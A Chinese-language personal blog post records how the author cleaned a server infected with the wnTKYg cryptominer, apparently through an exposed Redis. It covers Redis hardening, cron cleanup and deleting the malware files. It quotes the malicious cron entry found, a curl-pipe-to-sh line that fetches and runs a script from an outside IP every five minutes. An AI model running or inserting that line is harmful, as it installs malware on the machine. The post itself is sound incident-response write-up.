今天发现网站的后台进不去,而且前台的一些图片也显示不出来。远程连接服务器查看,原来有一个程序占用200%多的CPU,而且这个程序我不认识,好吧肯定是中病毒了。百度一下这个病毒wnTKYg。幸好百度给力啊,第一个就是解决方案,现在把方案和我自己的处理过程做个记录。
根据其他人的经验,这个是钻了redis的空子进来的,所以修改redis的相关配置
- 修改默认端口
- 设置密码
- 设置
bind xxx.xxx.xxx.xxx xxx.xxx.xxx.xxx
查看
/root/.ssh下的文件,找到known_hosts中发现不认识的IP,用防火墙禁掉它查看
/var/spool/cron文件夹下的定时任务中是否有可疑内容,如果有就干掉它 下面是我的可疑内容情况:*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh
直接删除即可,然后看一下是否还有哦可疑文件,有就直接删除。(需要百分百确保是没有用的文件)
查找相关的病毒文件,然后删除此文件
1
2find / -name wnTKYg*
rm -rf 相应目录下的wnTKYg文件找到此病毒的守护进程,使用top发现可疑进程
ddg.1007,找到后删除1
2find / -name ddg.*
rm -rf 相应目录下的ddg.*文件找到相应的
wnTKYg进程杀掉(ddg.1007同理)1
pgrep wnTKYg | xargs kill -s 9